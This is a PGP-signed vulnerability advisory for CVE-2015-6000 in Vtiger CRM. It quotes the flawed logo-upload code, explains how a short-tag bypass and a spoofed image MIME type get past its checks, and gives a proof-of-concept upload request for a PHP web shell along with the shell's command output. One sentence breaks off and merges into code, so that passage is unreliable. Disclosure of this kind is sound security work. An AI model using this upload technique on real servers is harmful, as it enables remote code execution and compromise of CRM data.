-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Vtiger CRM Authenticated Remote Code Execution (CVE-2015-6000) 1. Summary 2. Vulnerability Details 3. Exploitation / Proof of Concept 4. Timeline 5. See Also ########## 1. Summary ########## Vtiger CRM is a CRM application. Vtiger CRM version 6.3 (“Open Source” branch; released on 2015-06-04) and lower are vulnerable to Authenticated Remote Code Execution. ########## 2. Vulnerability Details ########## Vtiger CRM allows for the upload of a "company logo" from within the administrative interface. The corresponding functionality can be accessed on the "CRM Settings" page (Settings -> CRM Settings -> Templates -> Company Details -> "Edit" button; (<.../index.php?parent=Settings&module=Vtiger&view=CompanyDetails&block=4&fieldid=15>). Multiple flaws in the Settings_Vtiger_CompanyDetailsSave_Action class allow attackers to upload files with arbitrary file names and (almost) arbitrary contents, including, but not limited to, PHP code passing commands to the underlying operating system. First, the file type check is based solely on the MIME type ("Content-Type") sent by the client: (Source file: vtigercrm/modules/Settings/Vtiger/actions/CompanyDetailsSave.php) class Settings_Vtiger_CompanyDetailsSave_Action extends Settings_Vtiger_Basic_Action { [...] $logoDetails = $_FILES['logo']; $fileType = explode('/', $logoDetails['type']); $fileType = $fileType[1]; if (!$logoDetails['size'] || !in_array($fileType, Settings_Vtiger_CompanyDetails_Model::$logoSupportedFormats)) { $saveLogo = false; } This is followed by an insufficient check for PHP code inside the uploaded file: (Source file: vtigercrm/modules/Settings/Vtiger/actions/CompanyDetailsSave.php) // Check for php code injection $imageContents = file_get_contents($_FILES["logo"]["tmp_name"]); if (preg_match('/(<\?php?(.*?))/i', $imageContents) == 1) { $saveLogo = false; } Not only can this check be circumvented by using PHP short tags instead of “logoPath; $logoName = $uploadDir.$_FILES["logo"]["name"]; move_uploaded_file($_FILES["logo"]["tmp_name"], $logoName); copy($logoName, $uploadDir.'application.ico'); } Combining these flaws, an attacker can transfer arbitrary code to the web server, as long as s/he provides a permitted MIME type (e.g. "Content-Type: image/jpeg") and avoids the string “/test/logo/”). ########## 3. Exploitation / Proof of Concept ########## Through a specially crafted HTTP-POST request, a PHP file is stored on the server hosting the Vtiger CRM software: POST /index.php HTTP/1.1 Host: [...] Cookie: [...] Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------51732462825208 Content-Length: 2040 -----------------------------51732462825208 Content-Disposition: form-data; name="__vtrftk" [...] -----------------------------51732462825208 Content-Disposition: form-data; name="logo"; filename="2.php" Content-Type: image/jpeg -----------------------------51732462825208 Content-Disposition: form-data; name="address" [...] The resulting PHP file can then be accessed at /test/logo/2.php , which will execute the given commands and display their output: uid=3491(mussKV4JcX9c) gid=3491(mussKV4JcX9c) groups=3491(mussKV4JcX9c) Linux [...] 3.2.0-77-virtual #114-Ubuntu SMP Tue Mar 10 17:38:02 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux eth0 Link encap:Ethernet HWaddr [...] inet addr: [...] ########## 4. Timeline ########## 2015-08-28 Vulnerability reported to Vtiger. 2015-09-01 Vtiger acknowledges vulnerability. 2015-09-03 CVE-2015-6000 assigned by CERT/CC. 2015-09-28 Public disclosure. ########## 5. See Also ########## CVE-2015-6000 at cve.mitre.org: CVE-2015-6000 at NVD: Source: -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.21 iQIcBAEBAgAGBQJWCVMJAAoJEAg0a3ng3v4fyPQQAIQnPDewMWRG8SDvcbyRINPv VSYigmW2toTjNYv6/I5a+34fz9D3S1z425+4dXeuZQyT7LDvKsgZhtzOJE9HKXW4 MfEfCfUE6iWg+GOcrBztoF09tOuTNd+06l+BGIb7a7xQO+656XA+jQ6AULE9nPtC iaw4X3ArhA/nh1B3G5Bawz8AJxwC+bEjVG2sGeXaxbhLwiEtWD9Mfi+fZlMimr3k kmn5tQ21PevU5dKS7i2Cl6ykwcV1hrR5E2vyxYzpjy25242qMdcNyvZnvs28zpKa KV8CegrIo6N+sRyqBCd7aZfuZbDzkBaITq6C5Ae5VO5fnOHAfDM8gJG+SqH1enqM c0oqWtQ6m3Fqyp9Mu012Qi3cu7ONAYRd9ehBBnj59TLNAZYNf2n1pHMAxK6d7Skt 9v7+hPff1MpZqjcV7L/RJryREznG1gIQltlrd6fjMdazs6BIETfWDr/jBK33lAUX +rrWUX8H4JgFrlqXDpy0jTmom8mgNtb9qncQDxd5kpodSWE0SjTI8/zwm19qVX1G mIDRLXWBHqN41mA2KC/ac9Ep3Yj5AQrFQ3jXVq4VmdCMB50LeSXn1HyWzc6dmqmt +5Cct/NxIfXYXvcYAG+UkfOyxRDRZhhfw7PbUrI2fMx+vjoEuMDPDOcwmH/JSnU5 QufrotYWhaf1IkT21ZLr =pq0q -----END PGP SIGNATURE-----